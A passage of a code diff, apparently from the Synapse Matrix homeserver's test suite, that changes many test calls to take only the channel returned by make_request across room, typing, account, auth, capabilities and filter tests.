self.make_request(\"POST\", \"/createRoom\", \"{}\")", - "+ channel = self.make_request(\"POST\", \"/createRoom\", \"{}\")", - "@@ -428,5 +428,3 @@ class RoomsCreateTestCase(RoomBase):", - " # POST with visibility config key, expect new room id", - "- request, channel = self.make_request(", - "- \"POST\", \"/createRoom\", b'{\"visibility\":\"private\"}'", - "- )", - "+ channel = self.make_request(\"POST\", \"/createRoom\", b'{\"visibility\":\"private\"}')", - " self.assertEquals(200, channel.code)", - "@@ -436,5 +434,3 @@ class RoomsCreateTestCase(RoomBase):", - " # POST with custom config keys, expect new room id", - "- request, channel = self.make_request(", - "- \"POST\", \"/createRoom\", b'{\"custom\":\"stuff\"}'", - "- )", - "+ channel = self.make_request(\"POST\", \"/createRoom\", b'{\"custom\":\"stuff\"}')", - " self.assertEquals(200, channel.code)", - "@@ -444,3 +440,3 @@ class RoomsCreateTestCase(RoomBase):", - " # POST with custom + known config keys, expect new room id", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"/createRoom\", b'{\"visibility\":\"private\",\"custom\":\"things\"}'", - "@@ -452,6 +448,6 @@ class RoomsCreateTestCase(RoomBase):", - " # POST with invalid content / paths, expect 400", - "- request, channel = self.make_request(\"POST\", \"/createRoom\", b'{\"visibili')", - "+ channel = self.make_request(\"POST\", \"/createRoom\", b'{\"visibili')", - " self.assertEquals(400, channel.code)", - "- request, channel = self.make_request(\"POST\", \"/createRoom\", b'[\"hello\"]')", - "+ channel = self.make_request(\"POST\", \"/createRoom\", b'[\"hello\"]')", - " self.assertEquals(400, channel.code)", - "@@ -461,3 +457,3 @@ class RoomsCreateTestCase(RoomBase):", - " # Note the trailing space in the MXID here!", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"/createRoom\", b'{\"invite\":[\"@alice:example.com \"]}'", - "@@ -479,12 +475,12 @@ class RoomTopicTestCase(RoomBase):", - " # missing keys or invalid json", - "- request, channel = self.make_request(\"PUT\", self.path, \"{}\")", - "+ channel = self.make_request(\"PUT\", self.path, \"{}\")", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", self.path, '{\"_name\":\"bo\"}')", - "+ channel = self.make_request(\"PUT\", self.path, '{\"_name\":\"bo\"}')", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", self.path, '{\"nao')", - "+ channel = self.make_request(\"PUT\", self.path, '{\"nao')", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", self.path, '[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]'", - "@@ -493,6 +489,6 @@ class RoomTopicTestCase(RoomBase):", - "- request, channel = self.make_request(\"PUT\", self.path, \"text only\")", - "+ channel = self.make_request(\"PUT\", self.path, \"text only\")", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", self.path, \"\")", - "+ channel = self.make_request(\"PUT\", self.path, \"\")", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "@@ -501,3 +497,3 @@ class RoomTopicTestCase(RoomBase):", - " content = '{\"topic\":[\"Topic name\"]}'", - "- request, channel = self.make_request(\"PUT\", self.path, content)", - "+ channel = self.make_request(\"PUT\", self.path, content)", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "@@ -506,3 +502,3 @@ class RoomTopicTestCase(RoomBase):", - " # nothing should be there", - "- request, channel = self.make_request(\"GET\", self.path)", - "+ channel = self.make_request(\"GET\", self.path)", - " self.assertEquals(404, channel.code, msg=channel.result[\"body\"])", - "@@ -511,3 +507,3 @@ class RoomTopicTestCase(RoomBase):", - " content = '{\"topic\":\"Topic name\"}'", - "- request, channel = self.make_request(\"PUT\", self.path, content)", - "+ channel = self.make_request(\"PUT\", self.path, content)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -515,3 +511,3 @@ class RoomTopicTestCase(RoomBase):", - " # valid get", - "- request, channel = self.make_request(\"GET\", self.path)", - "+ channel = self.make_request(\"GET\", self.path)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -522,3 +518,3 @@ class RoomTopicTestCase(RoomBase):", - " content = '{\"topic\":\"Seasons\",\"subtopic\":\"Summer\"}'", - "- request, channel = self.make_request(\"PUT\", self.path, content)", - "+ channel = self.make_request(\"PUT\", self.path, content)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -526,3 +522,3 @@ class RoomTopicTestCase(RoomBase):", - " # valid get", - "- request, channel = self.make_request(\"GET\", self.path)", - "+ channel = self.make_request(\"GET\", self.path)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -542,20 +538,18 @@ class RoomMemberStateTestCase(RoomBase):", - " # missing keys or invalid json", - "- request, channel = self.make_request(\"PUT\", path, \"{}\")", - "+ channel = self.make_request(\"PUT\", path, \"{}\")", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", path, '{\"_name\":\"bo\"}')", - "+ channel = self.make_request(\"PUT\", path, '{\"_name\":\"bo\"}')", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", path, '{\"nao')", - "+ channel = self.make_request(\"PUT\", path, '{\"nao')", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(", - "- \"PUT\", path, b'[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]'", - "- )", - "+ channel = self.make_request(\"PUT\", path, b'[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]')", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", path, \"text only\")", - "+ channel = self.make_request(\"PUT\", path, \"text only\")", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", path, \"\")", - "+ channel = self.make_request(\"PUT\", path, \"\")", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "@@ -568,3 +562,3 @@ class RoomMemberStateTestCase(RoomBase):", - " )", - "- request, channel = self.make_request(\"PUT\", path, content.encode(\"ascii\"))", - "+ channel = self.make_request(\"PUT\", path, content.encode(\"ascii\"))", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "@@ -579,6 +573,6 @@ class RoomMemberStateTestCase(RoomBase):", - " content = '{\"membership\":\"%s\"}' % Membership.JOIN", - "- request, channel = self.make_request(\"PUT\", path, content.encode(\"ascii\"))", - "+ channel = self.make_request(\"PUT\", path, content.encode(\"ascii\"))", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"GET\", path, None)", - "+ channel = self.make_request(\"GET\", path, None)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -597,6 +591,6 @@ class RoomMemberStateTestCase(RoomBase):", - " content = '{\"membership\":\"%s\"}' % Membership.INVITE", - "- request, channel = self.make_request(\"PUT\", path, content)", - "+ channel = self.make_request(\"PUT\", path, content)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"GET\", path, None)", - "+ channel = self.make_request(\"GET\", path, None)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -616,6 +610,6 @@ class RoomMemberStateTestCase(RoomBase):", - " )", - "- request, channel = self.make_request(\"PUT\", path, content)", - "+ channel = self.make_request(\"PUT\", path, content)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"GET\", path, None)", - "+ channel = self.make_request(\"GET\", path, None)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -670,3 +664,3 @@ class RoomJoinRatelimitTestCase(RoomBase):", - " path = \"/_matrix/client/r0/profile/%s/displayname\" % self.user_id", - "- request, channel = self.make_request(\"PUT\", path, {\"displayname\": \"John Doe\"})", - "+ channel = self.make_request(\"PUT\", path, {\"displayname\": \"John Doe\"})", - " self.assertEquals(channel.code, 200, channel.json_body)", - "@@ -680,3 +674,3 @@ class RoomJoinRatelimitTestCase(RoomBase):", - "- request, channel = self.make_request(\"GET\", path)", - "+ channel = self.make_request(\"GET\", path)", - " self.assertEquals(channel.code, 200)", - "@@ -704,3 +698,3 @@ class RoomJoinRatelimitTestCase(RoomBase):", - " for i in range(4):", - "- request, channel = self.make_request(\"POST\", path % room_id, {})", - "+ channel = self.make_request(\"POST\", path % room_id, {})", - " self.assertEquals(channel.code, 200)", - "@@ -733,20 +727,18 @@ class RoomMessagesTestCase(RoomBase):", - " # missing keys or invalid json", - "- request, channel = self.make_request(\"PUT\", path, b\"{}\")", - "+ channel = self.make_request(\"PUT\", path, b\"{}\")", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", path, b'{\"_name\":\"bo\"}')", - "+ channel = self.make_request(\"PUT\", path, b'{\"_name\":\"bo\"}')", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", path, b'{\"nao')", - "+ channel = self.make_request(\"PUT\", path, b'{\"nao')", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(", - "- \"PUT\", path, b'[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]'", - "- )", - "+ channel = self.make_request(\"PUT\", path, b'[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]')", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", path, b\"text only\")", - "+ channel = self.make_request(\"PUT\", path, b\"text only\")", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "- request, channel = self.make_request(\"PUT\", path, b\"\")", - "+ channel = self.make_request(\"PUT\", path, b\"\")", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "@@ -757,3 +749,3 @@ class RoomMessagesTestCase(RoomBase):", - " content = b'{\"body\":\"test\",\"msgtype\":{\"type\":\"a\"}}'", - "- request, channel = self.make_request(\"PUT\", path, content)", - "+ channel = self.make_request(\"PUT\", path, content)", - " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", - "@@ -762,3 +754,3 @@ class RoomMessagesTestCase(RoomBase):", - " content = b'{\"body\":\"test\",\"msgtype\":\"test.custom.text\"}'", - "- request, channel = self.make_request(\"PUT\", path, content)", - "+ channel = self.make_request(\"PUT\", path, content)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -768,3 +760,3 @@ class RoomMessagesTestCase(RoomBase):", - " content = b'{\"body\":\"test2\",\"msgtype\":\"m.text\"}'", - "- request, channel = self.make_request(\"PUT\", path, content)", - "+ channel = self.make_request(\"PUT\", path, content)", - " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", - "@@ -782,5 +774,3 @@ class RoomInitialSyncTestCase(RoomBase):", - " def test_initial_sync(self):", - "- request, channel = self.make_request(", - "- \"GET\", \"/rooms/%s/initialSync\" % self.room_id", - "- )", - "+ channel = self.make_request(\"GET\", \"/rooms/%s/initialSync\" % self.room_id)", - " self.assertEquals(200, channel.code)", - "@@ -825,3 +815,3 @@ class RoomMessageListTestCase(RoomBase):", - " token = \"t1-0_0_0_0_0_0_0_0_0\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/rooms/%s/messages?access_token=x&from=%s\" % (self.room_id, token)", - "@@ -836,3 +826,3 @@ class RoomMessageListTestCase(RoomBase):", - " token = \"s0_0_0_0_0_0_0_0_0\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"/rooms/%s/messages?access_token=x&from=%s\" % (self.room_id, token)", - "@@ -869,3 +859,3 @@ class RoomMessageListTestCase(RoomBase):", - " # Check that we get the first and second message when querying /messages.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -897,3 +887,3 @@ class RoomMessageListTestCase(RoomBase):", - " # has been purged.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -914,3 +904,3 @@ class RoomMessageListTestCase(RoomBase):", - " # anymore.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -973,3 +963,3 @@ class RoomSearchTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1002,3 +992,3 @@ class RoomSearchTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1050,3 +1040,3 @@ class PublicRoomsRestrictedTestCase(unittest.HomeserverTestCase):", - " def test_restricted_no_auth(self):", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - " self.assertEqual(channel.code, 401, channel.result)", - "@@ -1057,3 +1047,3 @@ class PublicRoomsRestrictedTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", self.url, access_token=tok)", - "+ channel = self.make_request(\"GET\", self.url, access_token=tok)", - " self.assertEqual(channel.code, 200, channel.result)", - "@@ -1085,3 +1075,3 @@ class PerRoomProfilesForbiddenTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps(data)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -1098,3 +1088,3 @@ class PerRoomProfilesForbiddenTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps(data)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -1108,3 +1098,3 @@ class PerRoomProfilesForbiddenTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1141,3 +1131,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", - " reason = \"hello\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1155,3 +1145,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", - " reason = \"hello\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1169,3 +1159,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", - " reason = \"hello\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1183,3 +1173,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", - " reason = \"hello\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1195,3 +1185,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", - " reason = \"hello\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1207,3 +1197,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", - " reason = \"hello\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1226,3 +1216,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", - " reason = \"hello\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -1237,3 +1227,3 @@ class RoomMembershipReasonTestCase(unittest.HomeserverTestCase):", - " def _check_for_reason(self, reason):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1286,3 +1276,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1316,3 +1306,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1351,3 +1341,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1379,3 +1369,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", - " token = \"s0_0_0_0_0_0_0_0_0\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1396,3 +1386,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", - " token = \"s0_0_0_0_0_0_0_0_0\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1419,3 +1409,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", - " token = \"s0_0_0_0_0_0_0_0_0\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1450,3 +1440,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"/search?access_token=%s\" % self.tok, request_data", - "@@ -1485,3 +1475,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"/search?access_token=%s\" % self.tok, request_data", - "@@ -1532,3 +1522,3 @@ class LabelsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"/search?access_token=%s\" % self.tok, request_data", - "@@ -1653,3 +1643,3 @@ class ContextTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1717,3 +1707,3 @@ class ContextTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1807,3 +1797,3 @@ class RoomAliasListTestCase(unittest.HomeserverTestCase):", - " \"\"\"Calls the endpoint under test. returns the json response object.\"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1828,3 +1818,3 @@ class RoomAliasListTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", url, request_data, access_token=self.room_owner_tok", - "@@ -1858,3 +1848,3 @@ class RoomCanonicalAliasTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\", url, request_data, access_token=self.room_owner_tok", - "@@ -1865,3 +1855,3 @@ class RoomCanonicalAliasTestCase(unittest.HomeserverTestCase):", - " \"\"\"Calls the endpoint under test. returns the json response object.\"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\",", - "@@ -1877,3 +1867,3 @@ class RoomCanonicalAliasTestCase(unittest.HomeserverTestCase):", - " \"\"\"Calls the endpoint under test. returns the json response object.\"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "diff --git a/tests/rest/client/v1/test_typing.py b/tests/rest/client/v1/test_typing.py", - "index ae0207366..38c51525a 100644", - "--- a/tests/rest/client/v1/test_typing.py", - "+++ b/tests/rest/client/v1/test_typing.py", - "@@ -96,3 +96,3 @@ class RoomTypingTestCase(unittest.HomeserverTestCase):", - " def test_set_typing(self):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -119,3 +119,3 @@ class RoomTypingTestCase(unittest.HomeserverTestCase):", - " def test_set_not_typing(self):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -127,3 +127,3 @@ class RoomTypingTestCase(unittest.HomeserverTestCase):", - " def test_typing_timeout(self):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "@@ -140,3 +140,3 @@ class RoomTypingTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"PUT\",", - "diff --git a/tests/rest/client/v1/utils.py b/tests/rest/client/v1/utils.py", - "index 5a18af8d3..3d46117e6 100644", - "--- a/tests/rest/client/v1/utils.py", - "+++ b/tests/rest/client/v1/utils.py", - "@@ -83,3 +83,3 @@ class RestHelper:", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.hs.get_reactor(),", - "@@ -159,3 +159,3 @@ class RestHelper:", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.hs.get_reactor(),", - "@@ -194,3 +194,3 @@ class RestHelper:", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.hs.get_reactor(),", - "@@ -250,5 +250,3 @@ class RestHelper:", - "- _, channel = make_request(", - "- self.hs.get_reactor(), self.site, method, path, content", - "- )", - "+ channel = make_request(self.hs.get_reactor(), self.site, method, path, content)", - "@@ -335,3 +333,3 @@ class RestHelper:", - " path = \"/_matrix/media/r0/upload?filename=%s\" % (filename,)", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.hs.get_reactor(),", - "@@ -368,3 +366,3 @@ class RestHelper:", - " # first hit the redirect url (which will issue a cookie and state)", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.hs.get_reactor(),", - "@@ -413,3 +411,3 @@ class RestHelper:", - " # now hit the callback URI with the right params and a made-up code", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.hs.get_reactor(),", - "@@ -436,3 +434,3 @@ class RestHelper:", - " # matrix access token and device id.", - "- _, channel = make_request(", - "+ channel = make_request(", - " self.hs.get_reactor(),", - "diff --git a/tests/rest/client/v2_alpha/test_account.py b/tests/rest/client/v2_alpha/test_account.py", - "index 8a898be24..cb87b80e3 100644", - "--- a/tests/rest/client/v2_alpha/test_account.py", - "+++ b/tests/rest/client/v2_alpha/test_account.py", - "@@ -242,3 +242,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", - " def _request_token(self, email, client_secret):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -256,3 +256,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", - " # Load the password reset confirmation page", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -270,3 +270,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", - " # Confirm the password reset", - "- request, channel = make_request(", - "+ channel = make_request(", - " self.reactor,", - "@@ -304,3 +304,3 @@ class PasswordResetTestCase(unittest.HomeserverTestCase):", - " ):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -346,3 +346,3 @@ class DeactivateTestCase(unittest.HomeserverTestCase):", - " # Check that this access token has been invalidated.", - "- request, channel = self.make_request(\"GET\", \"account/whoami\")", - "+ channel = self.make_request(\"GET\", \"account/whoami\")", - " self.assertEqual(channel.code, 401)", - "@@ -401,3 +401,3 @@ class DeactivateTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"account/deactivate\", request_data, access_token=tok", - "@@ -524,3 +524,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -542,3 +542,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_3pid, access_token=self.user_id_tok,", - "@@ -563,3 +563,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -572,3 +572,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_3pid, access_token=self.user_id_tok,", - "@@ -595,3 +595,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -606,3 +606,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_3pid, access_token=self.user_id_tok,", - "@@ -623,3 +623,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - " # Attempt to add email without clicking the link", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -641,3 +641,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_3pid, access_token=self.user_id_tok,", - "@@ -656,3 +656,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - " # Attempt to add email without even requesting an email", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -674,3 +674,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_3pid, access_token=self.user_id_tok,", - "@@ -778,5 +778,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "- \"POST\", b\"account/3pid/email/requestToken\", body,", - "- )", - "+ channel = self.make_request(\"POST\", b\"account/3pid/email/requestToken\", body,)", - " self.assertEquals(expect_code, channel.code, channel.result)", - "@@ -788,3 +786,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - " ):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -801,3 +799,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", path, shorthand=False)", - "+ channel = self.make_request(\"GET\", path, shorthand=False)", - " self.assertEquals(200, channel.code, channel.result)", - "@@ -835,3 +833,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -853,3 +851,3 @@ class ThreepidEmailRestTestCase(unittest.HomeserverTestCase):", - " # Get user", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", self.url_3pid, access_token=self.user_id_tok,", - "diff --git a/tests/rest/client/v2_alpha/test_auth.py b/tests/rest/client/v2_alpha/test_auth.py", - "index a35c2646f..da866c8b4 100644", - "--- a/tests/rest/client/v2_alpha/test_auth.py", - "+++ b/tests/rest/client/v2_alpha/test_auth.py", - "@@ -69,5 +69,3 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", - " \"\"\"Make a register request.\"\"\"", - "- request, channel = self.make_request(", - "- \"POST\", \"register\", body", - "- ) # type: SynapseRequest, FakeChannel", - "+ channel = self.make_request(\"POST\", \"register\", body)", - "@@ -83,8 +81,8 @@ class FallbackAuthTests(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"GET\", \"auth/m.login.recaptcha/fallback/web?session=\" + session", - "- ) # type: SynapseRequest, FakeChannel", - "+ )", - " self.assertEqual(channel.code, 200)", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -186,3 +184,3 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # Get the list of devices so one can be deleted.", - "- _, channel = self.make_request(\"GET\", \"devices\", access_token=access_token,)", - "+ channel = self.make_request(\"GET\", \"devices\", access_token=access_token,)", - " self.assertEqual(channel.code, 200)", - "@@ -198,5 +196,5 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " \"\"\"Delete an individual device.\"\"\"", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"DELETE\", \"devices/\" + device, body, access_token=access_token,", - "- ) # type: SynapseRequest, FakeChannel", - "+ )", - "@@ -211,5 +209,5 @@ class UIAuthTests(unittest.HomeserverTestCase):", - " # the payload half-way through some tests.", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"delete_devices\", body, access_token=self.user_tok,", - "- ) # type: SynapseRequest, FakeChannel", - "+ )", - "diff --git a/tests/rest/client/v2_alpha/test_capabilities.py b/tests/rest/client/v2_alpha/test_capabilities.py", - "index 767e12687..e808339fb 100644", - "--- a/tests/rest/client/v2_alpha/test_capabilities.py", - "+++ b/tests/rest/client/v2_alpha/test_capabilities.py", - "@@ -38,3 +38,3 @@ class CapabilitiesTestCase(unittest.HomeserverTestCase):", - " def test_check_auth_required(self):", - "- request, channel = self.make_request(\"GET\", self.url)", - "+ channel = self.make_request(\"GET\", self.url)", - "@@ -46,3 +46,3 @@ class CapabilitiesTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", self.url, access_token=access_token)", - "+ channel = self.make_request(\"GET\", self.url, access_token=access_token)", - " capabilities = channel.json_body[\"capabilities\"]", - "@@ -64,3 +64,3 @@ class CapabilitiesTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(\"GET\", self.url, access_token=access_token)", - "+ channel = self.make_request(\"GET\", self.url, access_token=access_token)", - " capabilities = channel.json_body[\"capabilities\"]", - "@@ -72,3 +72,3 @@ class CapabilitiesTestCase(unittest.HomeserverTestCase):", - " self.get_success(self.store.user_set_password_hash(user, None))", - "- request, channel = self.make_request(\"GET\", self.url, access_token=access_token)", - "+ channel = self.make_request(\"GET\", self.url, access_token=access_token)", - " capabilities = channel.json_body[\"capabilities\"]", - "diff --git a/tests/rest/client/v2_alpha/test_filter.py b/tests/rest/client/v2_alpha/test_filter.py", - "index 231d5aefe..f761c4493 100644", - "--- a/tests/rest/client/v2_alpha/test_filter.py", - "+++ b/tests/rest/client/v2_alpha/test_filter.py", - "@@ -38,3 +38,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", - " def test_add_filter(self):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\",", - "@@ -51,3 +51,3 @@ class FilterTestCase(unittest.HomeserverTestCase):", - " def test_add_filter_for_other_user(self):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - 